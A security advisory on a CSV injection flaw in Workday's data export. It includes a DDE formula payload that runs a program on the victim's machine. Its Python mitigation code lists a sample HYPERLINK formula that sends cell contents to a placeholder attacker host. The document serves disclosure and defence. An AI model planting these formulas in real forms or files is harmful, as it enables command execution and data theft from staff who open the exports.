# Exploit Title: Workday - CSV Injection

# Exploit Author: sinfosec

2019-06-04

Product & Service Introduction:

===============================

Workday, Inc. is an on-demand (SaaS) financial management and human capital management software vendor.

Its products are built to current security and coding standards and are intended for high-availability web deployments.

Impact
======
Arbitrary spreadsheet formulas can be injected into exported CSV/Excel files.
When a user opens such a file, this can lead to command execution on the client machine via Dynamic Data Exchange (DDE), or to data leakage via injected HYPERLINK formulas that send cell contents to an attacker-controlled server.

Proof of Concept
================
To exploit this vulnerability, the attacker enters an Excel formula into any of the available contact form fields. If an administrator or HR user later exports the data as an Excel/CSV file, the exported cell contains the formula verbatim. When that user opens the file in Excel and accepts the DDE (external content) prompts, the formula is evaluated and the command runs on the user's machine.

Example payload (a DDE expression that makes Excel launch rundll32 to open calc.exe when it is evaluated):

=rundll32|'URL.dll,OpenURL calc.exe'!A

Solution
========

Workday's export routine should neutralize fields that start with '=', '+', '-' or '@' (and fields beginning with a tab or carriage return) when exporting to CSV or Excel, for example by prefixing them with a single quote and wrapping the field in double quotes, as recommended in OWASP's CSV injection guidance.
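The following Python is an added illustration, not code from this advisory or from Workday. It puts the vulnerable export (formula written out verbatim) beside a hardened one that applies the OWASP CSV-injection recommendation, and adds an audit function that scans an already-produced CSV for formula-like cells. The rows are constructed sample data; the payload in the first row is the one from the proof of concept above, and the HYPERLINK row illustrates the data-leakage variant.

```python
import csv
import io

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula
# (OWASP CSV injection guidance): '=', '+', '-', '@', and a leading tab or
# carriage return, which some importers also honour as formula triggers.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

FIELDNAMES = ["name", "phone", "note"]

# Constructed sample rows: the advisory's DDE payload, a HYPERLINK exfiltration
# formula (attacker.invalid is a reserved, non-resolving host), and benign data.
# The "+1 ..." phone number shows that legitimate values can start with a trigger.
SAMPLE_ROWS = [
    {"name": "Alice Example", "phone": "+1 555 0100",
     "note": "=rundll32|'URL.dll,OpenURL calc.exe'!A"},
    {"name": "Bob Example", "phone": "555-0101",
     "note": '=HYPERLINK("http://attacker.invalid/?d="&A1,"click")'},
    {"name": "Carol Example", "phone": "555-0102", "note": "regular comment"},
]


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would interpret this cell content as a formula."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value) -> str:
    """Return a cell value that a spreadsheet will display as plain text.

    Dangerous cells get a leading single quote, which forces text
    interpretation. The caller's csv.writer (QUOTE_ALL) then wraps the field
    in double quotes and escapes embedded double quotes, completing the OWASP
    recommendation. None becomes an empty cell; other types are stringified.
    """
    if value is None:
        return ""
    text = str(value)
    if not is_formula_like(text):
        return text
    return "'" + text


def export_csv(rows, fieldnames=FIELDNAMES, safe=True) -> str:
    """Serialize rows to CSV text. safe=False reproduces the vulnerable export."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        if safe:
            row = {k: neutralize_cell(v) for k, v in row.items()}
        writer.writerow(row)
    return buf.getvalue()


def find_injected_cells(csv_text: str):
    """Audit an existing CSV export: list (row, column) of formula-like cells.

    Row 0 is the header row. Quoting alone does not protect a cell, because
    Excel strips the quotes and then evaluates the content, so this scans the
    parsed cell values rather than the raw text.
    """
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                hits.append((r, c))
    return hits


if __name__ == "__main__":
    vulnerable = export_csv(SAMPLE_ROWS, safe=False)
    print("vulnerable export flags:", find_injected_cells(vulnerable))
    hardened = export_csv(SAMPLE_ROWS, safe=True)
    print("hardened export flags:", find_injected_cells(hardened))
    print(hardened)
```

Two caveats worth knowing before adopting this as-is. First, the single-quote prefix is visible when Excel opens the CSV (unlike typing an apostrophe into a cell), so benign values such as the "+1 555 0100" phone number above will display with a leading quote; if that is unacceptable, validate those fields at input time instead of rewriting them at export. Second, neutralizing at export is the last line of defence: rejecting or flagging formula-like input in the contact form itself removes the payload before it ever reaches an administrator's spreadsheet.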

Comments

  1. Good find! Does Workday still have a bug bounty program, or not anymore? I didn't find anything on their website.
